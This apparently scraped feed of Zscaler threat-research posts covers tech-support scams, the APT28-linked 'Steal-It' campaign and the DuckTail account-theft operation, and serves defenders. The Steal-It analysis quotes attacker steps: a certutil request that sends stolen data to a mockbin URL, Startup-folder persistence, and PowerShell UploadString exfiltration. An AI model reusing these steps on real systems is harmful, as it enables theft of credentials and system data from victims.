These sites may also offer discounts on renewal, which increases the likelihood of users making a purchase. This is shown in the screenshot below.
Figure 12: A deceptive McAfee-themed webpage falsely indicating that the user's system is vulnerable to virus infections and offering a discount.
Conclusion
Tech-support scams are updating their tactics as cybercriminals exploit Windows Action Center notifications to deceive users. Our research sheds light this shift in tactics, emphasizing the importance of staying informed and cautious.
In addition to staying on top of these threats, Zscaler's ThreatLabz team continuously monitors for new threats and shares its findings with the wider community.
Detection & Indicators of Compromise (IOCs)
Zscaler ThreatLabz Detection
HTML.Phish.TechSupport
Indicators of Compromise (IOCs)
dzz27sptilkop[.]cloudfront[.]net/werrx01/?phone=+XXXXXXXXX&
d2amlsdxhfbfr1[.]cloudfront[.]net/?number=+1-XXXXXXXXX
sea-turtle-app-yb2h9[.]ondigitalocean[.]app/?number=XXXXXXXXX
lobster-app-3vokw[.]ondigitalocean[.]app/?number=XXXXXXXXX
orca-app-txfhl[.]ondigitalocean[.]app/?number=XXXXXXXXX
squid-app-dcxll[.]ondigitalocean[.]app/?number=XXXXXXXXX
starfish-app-klskk[.]ondigitalocean[.]app/?number=XXXXXXXXX
oyster-app-2wnqh[.]ondigitalocean[.]app/?number=XXXXXXXXX
Domains Present in X (formerly Twitter) Posts
keewoach[.]net
whulsaux[.]com
naipsouz[.]net
potsaglu[.]net
vasteeds[.]net
dolatiaschan[.]com
oulsools[.]com
soocaips[.]com
zatloudredr[.]com
almstda[.]tv
zeekaihu[.]net
nebsefte[.]net
whoursie[.]com
thaudray[.]com
greewepi[.]net
Newly Registered Streaming Sites
worldsports1[.]live
powerakkus[.]com
trophional[.]com
acc-network[.]us
enake[.]site
soccerloverss[.]online
foreverstream[.]xyz
zodic[.]xyz
np-downloader[.]com
squathweenic[.]com
gemstreams[.]com
Sites Asking User to Grant Permission
sembilme[.]com
bonalluterser[.]com
exusnefte[.]com
scotennepruse[.]com
squathweenic[.]com
birmentuorpose[.]co[.]in
re-captha-version-3-23[.]top
ologeysurincon[.]com
chaeffulace.com
Redirected Fake Security Product Pages
yourtopdefencebulwark[.]site
myalltimebestdefender[.]site
sunfont[.]site
keepsafetycenter[.]com
worldwidedefence[.]online
improvedwebsecurity[.]com
webprotectionrequired[.]com
highpotencyguard[.]com
ultradesktopanalytic[.]com
analysesecuritystatus[.]com
datasecuritypc[.]com
totaldeviceanalyticsoft[.]club
X (formerly Twitter) Accounts
Gracie Walker @GinaSloan30632
Amy Day @DayAmy95254
Haven Joyce@DejaSchmid1862
Audrey Mayer @MelissaGal14721
Thu, 07 Sep 2023 09:29:44 -0700Rohit Hegdehttps://www.zscaler.com/blogs/security-research/rise-tech-support-scams-abusing-windows-action-center-notificationsSteal-It Campaign
https://www.zscaler.com/blogs/security-research/steal-it-campaign
Introduction
Zscaler ThreatLabz recently discovered a new stealing campaign dubbed as the "Steal-It" campaign. In this campaign, the threat actors steal and exfiltrate NTLMv2 hashes using customized versions of Nishang's Start-CaptureServer PowerShell script, executing various system commands, and exfiltrating the retrieved data via Mockbin APIs.
Through an in-depth analysis of the malicious payloads, our team observed a geofencing strategy employed by the campaign, with specific focus on targeting regions including Australia, Poland, and Belgium. These operations use customized PowerShell scripts, designed to pilfer crucial NTLM hashes before transmitting it to the Mockbin platform. The initial phase of the campaign involves the deployment of LNK files concealed in zip archives, while ensuring persistence within the system through strategic utilization of the StartUp folder. Additionally, the gathered system information and NTMLv2 hashes are exfiltrated using Mockbin APIs.
We believe the Steal-It campaign may be attributed to APT28 (aka Fancy Bear) based on its similarities with the APT28 cyber attack reported by CERT-UA in the Threat Actor Attribution section.
Key Takeaways
- Exfiltration Tactics: We discovered that the threat actor steals and exfiltrates NTLM hashes using customized scripts from the Nishang framework and system information by executing system commands. Once captured, the data is exfiltrated via mock APIs.
- Explicit Images as Lures: The Fansly Whoami Exfil and Exfil Sysinfo OnlyFans infection chain variations use explicit images of models to entice victims to execute the initial payload.
- Geofencing and Targeted Regions: Threat actors use a geofencing strategy with specific focus on targeting regions including Australia, Poland, and Belgium.
- Mockbin as a Service: We observed the use of Mockbin, an API endpoint generating tool, and mock APIs to transfer stolen data such as NTLM hashes and command output.
Campaign Analysis
After analyzing multiple samples for the Steal-It campaign, we categorized the infection chains based on the variations observed in the TTPs. The sections below depict these infection chains.
NTLMv2 Hash Stealing Infection Chain
How it works
Figure 1: NTLMv2 hash stealing infection chain flow
Overview
The NTLMv2 hash stealing infection chain steals NTLMv2 hashes by utilizing a customized version of Nishang’s Start-CaptureServer PowerShell script and transmitting the stolen hashes via mocky API’s to Mockbin.
Technical Analysis
The infection chain begins with a ZIP archive bundled with a malicious LNK (shortcut) file, the LNK file is commissioned to download and execute another PowerShell script from mockbin[.]org and webhook[.]site as seen in the screenshot below.
Figure 2: Initial LNK File downloading & executing a customized Nishang’s Start-CaptureServer PowerShell script
The PowerShell Script executed by the malicious LNK file is a customized version of Nishang’s Start-CaptureServer.ps1 script that is especially developed to capture NTLMv2 hashes.
The threat actors modified Start-CaptureServer.ps1 by removing:
comments
detectable strings ito evade static detections
basic authentication method for capturing credentials
The most significant modification our team observed was that the captured base64-encoded NTLMv2 hashes are exfiltrated by calling the Net.WebClient.DownloadString() function with the URL: https[:]//mockbin.org/bin/<id>”as an argument. This is depicted in the screenshot below.
Figure 3: A customized version of Nishang’s Start-CaptureServer PowerShell script
Once the DownloadString() function is executed, it performs a GET request to the specified mockbin.org URL.
Mockbin enables you to create custom endpoints for testing, mocking, and monitoring HTTP requests and responses across different libraries, sockets, and APIs. When the GET request is made to the Mockbin URL with a captured base64-encoded NTMLv2 hash, the request is logged on the server side and can be tracked by threat actors.
SystemInfo Stealing Infection Chain
How it works
Figure 4: Systeminfo stealing infection chain flow
Overview
The Systeminfo stealing infection chain uses the OnlyFans brand to entice users into downloading the later stages of the chain, which exfiltrate command outputs to Mockbin.
Technical Analysis
This infection chain starts with a ZIP archive named “best_tits.zip” bundled with a malicious LNK (shortcut) file called onlyfans.com-1.lnk.
Upon execution, the malicious LNK file runs a command that opens the Microsoft Edge browser with a base64 encoded argument. This argument is a JavaScript one liner redirecting to the http://run[.]mocky[.]io/v3/<id> URL using location.href. This is depicted in the screenshot below.
Figure 5: Initial LNK file - OnlyFans
To conceal the malicious redirection, the command also opens the legitimate OnlyFans website in another tab and pauses execution for 9 seconds.
Now the opened run[.]mocky[.]io URL is a HTML page with malicious JavaScript code that performs the following actions:
Verifies if the userAgent header includes the keyword "win" to determine if the operating system being used is Windows.
Utilizes the IPAPI Geolocation API to check if the country code is "AU" (Australia).
Specifically looking for the “AU” country code indicates the infection chain is geofenced and targeting users from Australia.
If the user’s operating system is Windows and they are located in Australia, the code proceeds to download another malicious LNK file named m8. This file is created by decoding a base64-encoded blob of data, as illustrated in the screenshot below.
Figure 6: Run[.]Mocky[.]io HTML page geofenced to target users from Australia
Furthermore, the downloaded LNK file is copied to the Startup folder as specified in the argument of the previous LNK file: move /y %userprofile%\Downloads\m8 m8.lnk.
Since the working directory of the previous LNK file is set to the Startup folder path, the LNK file is copied into the Startup folder. Because of this, the m8.lnk file will be executed every time the system is restarted, allowing persistence on the system.
When executed, the downloaded LNK file m8.lnk downloads a CMD file from run[.]mocky[.]io and copies it to the Startup folder as m8.cmd, following the same method as the previous LNK file. These actions are depicted in the screenshot below.
Figure 7: LNK file downloading the final script
The CMD file m8.cmd is executed on a system reboot, and is the final script commissioned to gather and exfiltrate the system information. Once executed, it first runs the following three system commands and stores the output in the ProgramData directory.
ipconfig
systeminfo
tasklist
From here, the script base64 encodes the command output files using CertUtil and sets environment variables for the base64-encoded command outputs using set /p ipc=<%programdata%\<b64enc_cmdoutput>.
The newly set environment variables are exfiltrated by performing a GET request to the mockbin[.]org using certutil -urlcache -f <http[:]//mockbin[.]org/bin/<id>/%env_var%. The environment variables are passed on in the request as shown in the screenshot.
Figure 8: Final script - Execute system commands and exfiltrate output to Mockbin.org
Towards the end of the script, clean up takes place where the command output files are deleted and the command outputs of executed commands: ipconfig, systeminfo, tasklist are exfiltrated to Mockbin URL.
Fansly Whoami Exfil Infection Chain
How it works
Figure 9: Fansly whoami exfil infection chain flow
Overview
The Fansly whoami exfil infection chain uses the Fansly brand to entice users into downloading the later stages of the chain, which exfiltrate command outputs to Mockbin.
Technical Analysis
This infection chain begins with a ZIP archive bundled with a malicious LNK (shortcut) file. The LNK file opens the http://run[.]mocky[.]io/v3/<id> URL in a browser, which consists of an HTML page with malicious Javascript. This HTML page is different from the page described in the "Systeminfo stealing infection chain" section. In this case, the JavaScript performs the following actions:
Verifies if the userAgent header includes the keyword "win" to determine if the operating system being used is Windows.
Utilizes the IPAPI Geolocation API to check if the country code is "PL" (Poland).
Verifies whether the IP address version is "ipv4"
Specifically looking for the “PL” country code indicates the infection chain is geofenced and targeting users from Poland.
If all of the conditions above are satisfied, the JavaScript downloads a ZIP file named fansly.zip by decoding a large base64 blob. The ZIP file includes three explicit JPEG images of Ukrainian and Russian Fansly models to lure users into downloading a malicious batch file, called fansly.com_online.bat, bundled inside the same ZIP archive.
Figure 10: Explicit images of Ukrainian & Russian Fansly models used to entice users into downloading a hidden file
Once executed, the fansly.com_online.cmd batch script performs the following actions:
Writes a VBScript & a batch script in the ProgramData directory and executes the VBscript.
The VBScript opens real Fansly model profiles to conceal the malicious actions and then executes the batch script written in the ProgramData directory.
Once executed, the batch script:
kills any running msedge.exe process
deletes any .css files in the downloads folder
opens a mockbin[.]org URL which downloads a eucv8o.css file into the Downloads folder
moves eucv8o.css into the ProgramData directory as eucv8o.cmd and then executes
When the mockbin[.]org URL is opened by the batch script in an Microsoft Edge browser, the JavaScript performs the following actions:
Verifies if the userAgent header includes the keyword "win" to determine if the operating system being used is Windows.
Ensures that userAgent does not contain the string “wow” which indicates that the 32-bit process is running in a 64-bit Windows machine.
Checks if the browser version (Chrome/Firefox”UserAgent - Microsoft Edge also uses Chrome) is greater than "100".
If all conditions above are satisfied, the JavaScript redirects to another mockbin[.]org URL which executes another JavaScript code that performs the following actions:
Verifies if the userAgent header includes the string “edg” to determine if the Microsoft Edge browser is being used.
Leverages the IPAPI Geolocation API to check if the country code is "PL" (Poland)
If all the conditions above are met, a eucv8o.css file is downloaded by decoding a base64 blob in the Downloads folder. As mentioned above, eucv8o.css is moved into the ProgramData directory as eucv8o.cmd and then executed:
kills the msedge.exe process
executes “whoami” command and stores the output in the ProgramData directory
sets the environment variable dobpyk to the output of the whoami command
exfiltrates the output of the WHOAMI command to the mockbin[.]org URL by sending a GET request with the appended command output, like this: mockbin[.]org/bin/<id>/<cmd_output>
deletes the command output file and the downloaded .css file
The execution flow is depicted in the screenshot below:
Figure 11: Execute whoami and exfiltrate the output to Mockbin.org
Windows Update Exfil Infection Chain
How it worksFigure 12: Windows update exfil infection chain flow
Overview
In our analysis of this infection chain, we observed a ZIP archive bundled with a LNK file that uses geofencing techniques to target users in Belgium and unknowingly downloading multiple stages of a PowerShell script that executes system commands to collect basic information for nefarious purposes. Interestingly, we saw a similar infection reported by CERT-UA which was attributed to APT28.
Technical Analysis
For this infection chain, the initial vector is a malicious LNK file bundled inside a ZIP archive (e.g. command_powershell.zip). The malicious LNK file opens the run[.]mocky[.]io URL using Microsoft Edge. This downloads a c1 file into the Downloads folder, which is then moved into the Startup folder as c1.bat, maintaining persistence on the machine. Whenever the system is restarted, c1.bat is executed.
Figure 13: Initial LNK file
Once opened, the run[.]mocky[.]io URL executes a JavaScript code which downloads a batch script from a base64-encoded blob. The batch script is downloaded to the Downloads folder, where it is then renamed to c1.bat and moved into the Startup folder.
c1.bat includes the “Window Update” title (identical to the phishing email subject) and is primed to download another script from run[.]mocky[.]io into the ProgramData directory using CertUtil.
To conceal the malicious activity, the batch script shows an seemingly innocuous message on the console with a progress bar. The message reads:
“Dynamic Update for Windows Systems (KB5021043)”
This is depicted in the image below.
Figure 14: Fake Windows update BAT script execution to download the additional stages
The LNK file opens a run[.]mocky[.]io URL using Microsoft Edge, which then performs following actions:
Verifies if the userAgent header includes the keyword "edg" to determine if the browser used is “Microsoft Edge”
Utilizes the IPAPI Geolocation API to check if the country code is "BE" (Belgium)
Specifically looking for the “BE” country code indicates the infection chain is geofenced and targeting users from Belgium.
Figure 15: Geofenced HTML that target users from Belgium
If both the conditions above are satisfied, a b4.css script is downloaded into the Downloads folder by decoding a base64 blob. The script is then moved into the Startup folder and renamed to b4.cmd. This helps threat actors maintain persistence like in the other infection chains.
Upon execution, b4.cmd opens another run[.]mocky[.]io URL using Microsoft Edge, which is similar to the JavaScript code seen in Figure 15.
The JavaScript code executes the batch script with the title “Window Update” and displays a an innocent message on the console with a progress bar stating:
“Dynamic Update for Windows Systems (KB5021043)”
From here, another script is downloaded from run[.]mocky[.]io in the ProgramData directory using CertUtil to execute it.
During the analysis, the Mocky URL was inaccessible, therefore while searching for similar scripts with the “Window Update” messages as shown in Figure 14, we discovered a PowerShell script which executes a final set of PowerShell commands downloaded from run[.]mocky[.]io. This script also uses the window title as “Updating Windows” and the message “Dynamic Cumulative Update for Windows (KB5023696)” to conceal malicious intentions as depicted in the screenshot below and was also reported previously.
Figure 16: Fake Windows update PowerShell script executes system commands and exfiltrates output
The final set of PowerShell commands in this script are commissioned to execute the commands tasklist and systeminfo on the system, and then use WebClient.UploadString() to exfiltrate the command output to the mockbin[.]org URL using a POST request as shown below.
In addition to system information, we also observed cases where the full file paths were exfiltrated to mockbin[.]org by executing the “Get-ChildItem -Path <path> -Recurse -File | select FullName” command and then exfiltrate the command output using WebClient.UploadString().
Threat Actor Attribution
Our team believes that the Steal-It campaign could be attributed to APT28, Russian cyber espionage group with medium confidence level. The similarities between our observations of these four infection chains discussed in the Steal-It Campaign and the APT28 cyber attack reported by CERT-UA (Computer Emergency Response Team of Ukraine) are striking. The Steal-It Campaign and the CERT-UA’s report shared the following:
Similar PowerShell scripts for exfiltrating system information and the downloading of further stages with varied infection chain.
Similar Mockbin URLs in payloads and abusing Mockbin API’s for hosting scripts and exfiltration of information.
Similar TTPs such as gathering system information by executing commands and exfiltration of data using Mockbin APIs
Similar “Windows Update” theme.
Conclusion
Zscaler ThreatLabz’s analysis of the Stealing campaign named as “The Steal-It Campaign” indicates their targeted geofencing strategy and sophisticated tactics. For example, the threat actors' custom PowerShell scripts and strategic use of LNK files within zip archives highlights their technical expertise. The persistence maintained by moving files from the Downloads to Startup folder and renaming them underscores the Threat Actors dedication to prolonged access.
The meticulousness and technical process demonstrated by the Steal-It campaign emphasizes the importance of robust cybersecurity measures. In addition to staying on top of these threats, Zscaler's ThreatLabz team continuously monitors for new threats and shares its findings with the wider community.
Zscaler Sandbox Coverage
Zscaler's multilayered cloud security platform detects indicators at various levels. During the investigation of this campaign, Zscaler Sandbox played a crucial role in analyzing the behavior of various files. Through this sandbox analysis, the threat scores and specific MITRE ATT&CK techniques triggered were identified, as illustrated in the screenshot provided below. This comprehensive approach empowers cybersecurity professionals with critical insights into the malware's behavior, enabling them to effectively detect and counter the threats posed by the Threat Actors.
The image below shows the Zscaler cloud sandbox report for LNK Files attributed to APT28 (LNK.Downloader.APT28).
Figure 17: Zscaler sandbox detection
In addition to sandbox detection, Zscaler’s multilayered cloud security platform detects indicators at various levels.
LNK.Downloader.APT28
MITRE ATT&CK TTP Mapping
ID
TECHNIQUE NAME
T1598
Phishing
T1059
Command and Scripting Interpreter
T1212
Exploitation for Credential Access
T1567
Exfiltration Over Web Service
T1037
Startup Items
Indicators of Compromise (IoCs)
NTLMv2 Hash Stealing
LNK
022d01e7007971f5a5096c4f2f2b2aa4
1e2a320658ba5b616eae7a3e247f44a6
Customized Nishang Start-CaptureServer PowerShell script
URL: mockbin[.]org/bin/de22e2a8-d2af-4675-b70f-e42f1577da6e
URL: https[:]//webhook[.]site/33128548-0eda-4e2b-bf89-7b1b225ecb9f
Script: 358d9271b8e207e82dafe6ea67c1d198
SystemInfo Stealing
LNK
4083396ab0344c4731a30d4931bb1963
URL
http[:]//run[.]mocky[.]io/v3/cee6d18e-5adb-4fbd-b47b-989768473c66
http[:]//run[.]mocky[.]io/v3/99c677eb-21e1-4064-9ab4-9ee9dfd2ef13
Fansly Whoami Exfil
URL
https[:]//run.mocky.io/v3/869e530a-51f7-4bec-ae6e-3effb1737691
https[:]//run.mocky.io/v3/f4ccbf43-9f2a-4c08-af0a-35be079694a8
Windows Update Exfil
LNK
02af0a334507fcdf7b374dff90eddead
468afeebde1c65b96e6d10e11428598e
c95eed189823c9a2c7206d13ff953bdf
URL
http[:]//run[.]mocky[.]io/v3/2e757b51-c023-4bb6-9d3f-68489571abd7
https[:]//run[.]mocky[.]io/v3/e0687bb8-d14b-4ee0-8c47-202c5aaab48c
http[:]//run[.]mocky[.]io/v3/ef2c9f34-11f5-4a99-b31c-6b203b5d5313
Wed, 06 Sep 2023 08:15:29 -0700Niraj Shivtarkarhttps://www.zscaler.com/blogs/security-research/steal-it-campaignA Look Into DuckTail
https://www.zscaler.com/blogs/security-research/look-ducktail
Introduction
In our persistent quest to decode DuckTail’s maneuvers, Zscaler ThreatLabz began an intelligence collection operation in May 2023. Through an intensive three-month period of monitoring, we obtained critical details about DuckTail’s operational framework. This expedition granted us unprecedented visibility into DuckTail’s end-to-end operations, spanning the entire kill chain from reconnaissance to post-compromise.
Our team yielded valuable insights into DuckTail’s intrusion techniques, compromise tactics, post-compromise procedures, and the underground economy. These insights, some of which have never been publicly documented, provide a panoramic view of their targets and an understanding of their strategic motives.
This report dives into the operational mechanics of DuckTail, dissecting the anatomy of their tactics, techniques and procedures (TTPs), and tracing the trajectory of stolen data.
Key Takeaways
Ideal Social Engineering Target: DuckTail threat actors primarily target users working in the digital marketing and advertising space. Unfortunately, the tech layoffs occurring in 2022 and 2023 introduced more eager candidates into the digital market - meaning more prime targets for DuckTail.
Raiding Business and Ad Accounts: DuckTail targets Facebook and TikTok business accounts, and Google ad accounts. Stolen social media business accounts feed an underground economy where these accounts are traded among other users in Vietnamese Telegram groups.
Social Engineering as the Distribution Method: DuckTail’s primary distribution vector continues to be social engineering through LinkedIn messaging. Threat actors set up fake LinkedIn recruiter profiles and fake job postings impersonating popular companies to lure unsuspecting victims looking for employment.
Expanding and Always Evolving: DuckTail continues to expand the list of cloud services abused for hosting and distributing payloads.
Exploiting Themes of Innovative AI Online Tools: DuckTail threat actors have successfully weaponized the recent popularity of generative AI platforms, such as ChatGPT and Google Bard AI, to lure victims to install malicious software.
Stealthy and Strategic Maneuvers: DuckTail threat actors use private residential proxy services to log in to compromised social media business accounts to prevent raising any security alarms. In addition, they abuse the "Encrypted notifications" Facebook feature to prevent the victim from performing an account recovery.
Brief Overview
DuckTail is an operation that involves multiple Vietnam-based threat actors who share the same tactics, techniques, and procedures (TTPs). They also share the same motivation: gain access to social media business accounts, specifically ones belonging to digital marketers.
DuckTail malware steals saved session cookies from browsers, with code specifically tailored to take over Facebook business accounts.The malware is typically spread on LinkedIn, where threat actors post fake job descriptions to “recruit” potential victims.
The “products” of the operation (i.e. hacked social media accounts) feed an underground economy of stolen social media accounts, where numerous vendors offer accounts priced according to their perceived usefulness for malicious activity. The image below shows a high-level overview of how DuckTail threat actors abuse different cloud services and social media platforms in their whole operation:
Figure 1: Visual overview illustrating how DuckTail abuses social media and cloud platforms in different stages of their operation.
Unveiling DuckTail’s TTPs
Overview of the architecture
The threat research community is already abundant with great articles that address the technical details of DuckTail’s malware payload.
Distribution methods and techniques
The following sections break down:
the infection vectors employed by Ducktail
what those infection campaigns look like
Fake Job Posts on LinkedIn
DuckTail primarily reaches victims by posting fake marketing-related job listings on LinkedIn. The threat actors presume that the marketing professionals who apply likely have access to ad accounts. The image below is an example of a fake job post on LinkedIn used by Ducktail to lure an unsuspecting candidate.
Figure 2: This is what the threat actor sees moments after setting up a fake marketing job post on LinkedIn. It’s worth noting that the post is promoted.
In addition to creating fake job posts on LinkedIn, threat actors also set up profiles on LinkedIn impersonating recruiters. To facilitate social engineering tactics, in some cases, threat actors add the “Hiring” banner to their LinkedIn profile picture. This catches the attention of users actively seeking a new job.
Once a potential victim responds to a bait post, the “recruiter” will send a message on LinkedIn.
How it works
The threat actors will ask the interested applicant to review the job application package by:
Downloading an archive
Opening it on a Windows machine
Double-clicking the executable (camouflaged as another type of file) inside it
To maximize their chance of infection, some threat actors create instructional videos showing victims how to “properly” infect their own devices. The image below shows this tactic in action:
Figure 3: “Ashley Swarts” (a fake threat actor account) instructing a victim on how to open the fake job application package.
The nuances of language
The threat actor’s English proficiency closely matches the English language skills of an average Vietnamese cybercriminal, not an American HR professional.
Our team observed threat actors using Google Translate to communicate with potential victims. The image below shows a threat actor translating messages from English to Vietnamese in real-time as they communicate with a victim. The predominant use of the Vietnamese language also supports our attributing DuckTail to Vietnamese threat actors.
Figure 4: A threat actor using Google Translate to communicate in English while handling multiple fraudulent job application conversations on LinkedIn.
Impersonating real companies
DuckTail threat actors send job offers impersonating popular organizations and brands to entice job seekers.
In the image below, a threat actor leveraged a compromised LinkedIn account to message a victim with job opportunity details. While impersonating a real company called Mondelez International, this threat actor sent the following in their message:
a link to the company's real Wikipedia and Facebook page
an iCloud URL hosting an archive file containing the malware
Figure 5: A threat actor messaging a victim on LinkedIn and impersonating a real company.
Spear phishing emails
Our team also observed cases where threat actors sent infected archive links through email, after making initial contact on LinkedIn. The image below shows a spear phishing email example.
Figure 6: A spear phishing email sent to a victim containing the URL shortener link, which downloads the malicious archive file.
.NET executables as a common thread in DuckTail binaries
Most commonly, DuckTail’s malware payload is a .NET executable, but this is not always the case. Some Ducktail payloads come in an Excel add-in or browser extension.
The .NET executables family associated with the Ducktail variants share the following attributes:
Large file sizes, in most cases - around 70 MB or more
Includes a fake Office or PDF document icon
Contains a decoy document with details about the fake job offer/marketing advertisement, which opens right after execution
Signed with valid code-signing certificates belonging to Vietnamese publishers (sometimes)
Makes use of Telegram for C2 communications
The executable is usually delivered in an archive, together with image and video files. The images below depict two common archive variations.
Type 1 Archive
Figure 7: Type 1 Archive - .exe files with fake icons (first row), together with job-related images
Type 2 Archive
Figure 8: Type 2 Archive - .lnk files with PowerShell payloads, plus .scr executables, both obscured by double extensions (.pdf.lnk, .docx.scr), together with job-related images
Cloud hosting and URL shortening services
Our research team noticed the following patterns when investigating DuckTail’s infrastructure:
Malicious archives are often hosted on public cloud hosting services like iCloud, Google Drive, Dropbox, Transfer.sh, and OneDrive.
In some cases, threat actors use Trello, a project management platform, as a cloud hosting service by uploading archives as attachments to Trello cards and providing victims with a direct download link to the card.
Another widely abused platform is Rebrandly (rebrand.ly) - a URL shortener service. Threat actors spread download links generated by Rebrandly to give the download a more legitimate look. You can see the difference that Rebrandly makes in the image below.
Figure 9: A redirection chain set up by the threat actor transforms a long, unfriendly Dropbox link into a short rebrand.ly link.
Newly registered domains used to host payloads
In addition to disguising links with Rebrandly, threat actors also registered many custom domains through Rebrandly, spreading shortened links with their own fake company name domains.
Most of these custom domains registered by the threat actor use TLDs like:
.social
.software
.sale
.click
.news
.agency
.company
For a complete list of newly registered domains used by DuckTail, visit the Indicators of Compromise (IOCs) section at the bottom of this blog.
Marketing guides and AI tools
Another method of infection is the creation of web pages pretending to offer marketing guides and marketing software, but actually serving DuckTail malware.
We observed the following legitimate marketing and AI tools spoofed:
Adplexity
ClickMinded
ChatGPT
Google BardAI
Generative AI softwares, like ChatGPT, are prime targets because they are being increasingly utilized by professionals working in digital marketing, content creation, and advertising.
The image below shows a web page created by a threat actor leveraging ChatGPT for Facebook advertising.
Figure 10: A screenshot of newguide[.]tech, a website set up by Ducktail to leverage ChatGPT.
Below, there is another example of a website set up by a threat actor impersonating Adplexity.
Figure 11: A screenshot of adplexitydesk[.]tech, a website set up by Ducktail impersonating Adplexity. The download button leads to a Ducktail infected archive.
Insights Gained
In the following sections, we share insights about the threat actors operating DuckTail and the strategies they employ.
Primary targets and industries
While Ducktail is mostly known for targeting Facebook users, we observed threat actors stealing and abusing access to victim accounts on other advertising platforms, namely TikTok Business and Google Ads. This ability to pilfer multiple platforms is due to Ducktail’s general-purpose cookie stealing capabilities.
Communication channels and techniques
The threat actors use the following platforms to communicate and trade stolen information:
Telegram
Facebook
Zalo (a Vietnamese messaging app)
The threat actors set up Telegram bots to automatically handle data arriving from new victims. This allows them to pinpoint the most important information, like:
the victim’s Facebook account information
the number of detected ad accounts
business manager accounts
Figure 12: A bot introduces a new victim’s Facebook profile. An American with control over four personal ad accounts and three business manager accounts.
Infiltration strategies
Adding threat actor email addresses to compromised accounts
One of the primary methods threat actors use to takeover a victim’s compromised account is by adding their own email address to that account.
In the image below, Facebook emailed a security notification to a victim informing them that a threat actor has added an email address to their account.
Figure 13: This screenshot shows a security notification warning a victim about a new email address added to their account - indicating that a Ducktail threat actor has begun a takeover of their Facebook account.
Updating password and email for compromised accounts
DuckTail threat actors change the password and email address of a Facebook account during takeover.
Abusing Facebook Encrypted Notifications feature
We observed an instance where, after taking over a victim’s Facebook account, the threat actor enabled the Encrypted Notifications setting. This way every Facebook email communication with the victim is encrypted - effectively preventing the victim from recovering their account.
Using compromised LinkedIn accounts for communication
While investigating communication between threat actors and victims on LinkedIn, we came across instances where threat actors contacted victims using compromised LinkedIn accounts.
These compromised LinkedIn accounts belonged to users working in the digital marketing space. Some of the compromised LinkedIn accounts had more than 500 connections and 1000 followers. The high amount of connections/followers helped lend authenticity to the compromised accounts and facilitated the social engineering process for threat actors.
How are the threat actors compromising LinkedIn accounts?
We believe, with a medium-confidence level, that some of these compromised LinkedIn accounts were purchased in underground markets by DuckTail threat actors. We discovered an internal budgeting spreadsheet used by the DuckTail team which details their revenue and expenditures. One of the entries in the spreadsheet corresponded to the purchase of LinkedIn accounts.
We believe, with a high-confidence level, that threat actors are compromising the LinkedIn accounts of users who fell victim to DuckTail’s initial attack where victims were enticed with fraudulent job posts and fake recruiters. We reached this conclusion after observing a conversation between members of the DuckTail group. One member directed another member to access a victim's Gmail account (using the stolen browser cookies), delete email entries related to LinkedIn (to clear traces), and change the account recovery email address to an attacker-controlled email.
Compromising TikTok business accounts
The image below shows the activity log page of a victim’s compromised TikTok Business account. The log depicts the threat actor inviting themselves to control the account and then performing actions. After three days, the targeted business notices and revokes their access.
Figure 14: This is a TikTok business center activity log for a compromised account, showing the actions executed by the threat actor.
Leveraging residential proxy services to access compromised accounts
Our team observed DuckTail threat actors using “Residential Proxy” services to circumvent Facebook account compromise detections.
In the image below, the attacker’s machine uses the “S5 Proxy” residential proxy service from the vendor - 922proxy.com. Interestingly, the UI also shows the threat actor’s own original IP address. We confirmed with an IP geolocation lookup that the threat actor’s original IP address maps to a city in Vietnam, further strengthening our theory that DuckTail is operated by Vietnam-based threat actors.
Figure 15: This screenshot shows a threat actor connecting to a residential proxy in Konya, Turkey, before logging into the compromised Facebook account of a victim.
Stolen Credentials Enter Underground Market
Social media ad accounts are constantly targeted for hacking. Threat actors, like those behind the Ducktail operation, collect massive amounts of hacked accounts. But where do they end up?
Hacked social media and ad accounts end up for sale in a busy Vietnamese-language underground market. Here is what we know about this market:
Mainly Facebook accounts are sold
It includes numerous publicly accessible Telegram groups
DuckTail threat actors are active sellers
Despite the illicit nature of these groups, they are public and easily accessible. Although it may be difficult for a novice to interpret the jargon and abbreviations that are heavily used in the community.
Awareness of OPSEC among those involved appears to be be lacking or non-existent.
Figure 16: In this screenshot, vendors offer access to hacked Facebook accounts on a Vietnamese Telegram group.
Threat actors target ad accounts so they can access ad budgets. High ad budgets and long-term accessibility to accounts are attractive characteristics to threat actors.
Facebook combats threat actors like Ducktail, who hack and abuse ad accounts on their platform, by automatically flagging suspicious accounts. Because of this, threat actors try to prolong the life of a compromised ad account. For this reason, hacked Facebook accounts are not interchangeable commodities. Depending on an account’s properties, it may range from very valuable to almost useless to buyers.
Here are common properties that vendors and buyers check for in this underground market:
The type of account (a personal ad account or a business manager account)
The daily ad budget and payment threshold of an account
The number of ad accounts a business manager account controls
A successful business verification by Facebook
If the account controls a page or profile with a verified badge
The age of the account. Older accounts are more valuable than younger.
The existence and validity of saved payment methods
The account’s successful payment history. More successful payments indicate a more valuable account.
We observed the following Vietnamese browser extension used for displaying account properties:
Figure 17: A screenshot of the Vietnamese-designed browser extension used by threat actors to quickly assess social media business account details.
Payments and Transactions
We observed that an account deemed “low-grade” sells for around 350,000 Vietnamese dong (~$15 USD), while accounts considered valuable sell for around 8,000,000 Vietnamese dong (~$340 USD).
When a transaction is complete, the seller hands over control of the hacked account by:
Adding/inviting the buyer to control the account through Facebook (business manager)
Providing the victim’s login and password to the compromised account
Providing the victim’s exported browser cookies, thus replicating their logged-in session
If the level of compromise is thorough, access to the victim’s email may be given on top of the above to maintain access even longer, and also be able to bypass MFA security measures.
Conclusion
In this blog, ThreatLabz provides a wealth of new insight for the research community. Understanding the operational methods and end-to-end journey of a threat actor like DuckTail is a form of protection. Because of our research team, we can confidently state:
DuckTail is primarily run by Vietnamese-speaking cyber criminals who use Google Translate to communicate with potential victims over LinkedIn.
DuckTail threat actors target personal, business, and ad accounts on platforms like TikTok, Facebook, LinkedIn, and Google, and use social engineering to infect devices.
DuckTail threat actors are abusing themes of popular AI tools, like ChatGPT, to infect devices.
DuckTail threat actors take extra measures to prevent raising security alarms by using private residential proxy services to log in to compromised accounts.
DuckTail threat actors use strategic account takeover methods which they routinely use in their post-compromise procedures to prevent any form of account recovery by victims
Hacked and/or compromised social media business ad accounts enter a primarily Vietnamese-based underground market where they are sold based on their perceived value.
You can take steps to minimize the impact of a hacker by managing your saved payment methods in business ad accounts and making use of safeguards like daily spending limits, payment thresholds, etc.
In addition to staying on top of these threats, Zscaler's ThreatLabz team continuously monitors for new threats and shares its findings with the wider community.
Zscaler Sandbox Detection
The figure below shows the sandbox detection for the Windows shortcut (LNK) file which is used to kick start the DuckTail infection chain.
